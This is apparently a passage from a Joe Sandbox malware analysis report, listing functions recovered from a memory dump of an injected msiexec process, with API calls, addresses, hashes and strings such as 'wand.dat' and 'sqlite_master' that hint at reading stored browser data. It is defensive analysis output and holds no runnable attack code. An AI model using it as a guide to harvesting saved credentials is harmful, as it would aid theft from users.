                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                      • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memcmp
                                                                      • String ID:
                                                                      • API String ID: 3384217055-0
                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$memcpy
                                                                      • String ID:
                                                                      • API String ID: 368790112-0
                                                                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                      APIs
                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                      • String ID:
                                                                      • API String ID: 1889144086-0
                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                      APIs
                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                      • String ID:
                                                                      • API String ID: 1661045500-0
                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                      APIs
                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                      Strings
                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpymemset
                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                      • API String ID: 1297977491-2063813899
                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040560C
                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                      • String ID: *.*$dat$wand.dat
                                                                      • API String ID: 2618321458-1828844352
                                                                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                      APIs
                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                      • _wtoi.MSVCRT(?), ref: 00410C80
                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                      • String ID:
                                                                      • API String ID: 1549203181-0
                                                                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00412057
                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                      • String ID:
                                                                      • API String ID: 3550944819-0
                                                                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                      APIs
                                                                      • free.MSVCRT ref: 0040F561
                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$free
                                                                      • String ID: g4@
                                                                      • API String ID: 2888793982-2133833424
                                                                      • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                      • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: @
                                                                      • API String ID: 3510742995-2766056989
                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                      • memset.MSVCRT ref: 0040AF18
                                                                      • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@memcpymemset
                                                                      • String ID:
                                                                      • API String ID: 1865533344-0
                                                                      • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                      • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004144E7
                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                      • memset.MSVCRT ref: 0041451A
                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                      • String ID:
                                                                      • API String ID: 1127616056-0
                                                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                      • memset.MSVCRT ref: 0042FED3
                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memset
                                                                      • String ID: sqlite_master
                                                                      • API String ID: 438689982-3163232059
                                                                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                      APIs
                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                      • String ID:
                                                                      • API String ID: 3917621476-0
                                                                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                      APIs
                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                      • String ID:
                                                                      • API String ID: 822687973-0
                                                                      • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                      • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                      • malloc.MSVCRT ref: 00417459
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                      • free.MSVCRT ref: 0041747F
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                      • String ID:
                                                                      • API String ID: 2605342592-0
                                                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                      • RegisterClassW.USER32(?), ref: 00412428
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                      • String ID:
                                                                      • API String ID: 2678498856-0
                                                                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Item
                                                                      • String ID:
                                                                      • API String ID: 3888421826-0
                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00417B7B
                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                      • String ID:
                                                                      • API String ID: 3727323765-0
                                                                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040F673
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                      • String ID:
                                                                      • API String ID: 2754987064-0
                                                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                      • String ID:
                                                                      • API String ID: 2754987064-0
                                                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00402FD7
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                      • strlen.MSVCRT ref: 00403006
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                      • String ID:
                                                                      • API String ID: 2754987064-0
                                                                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
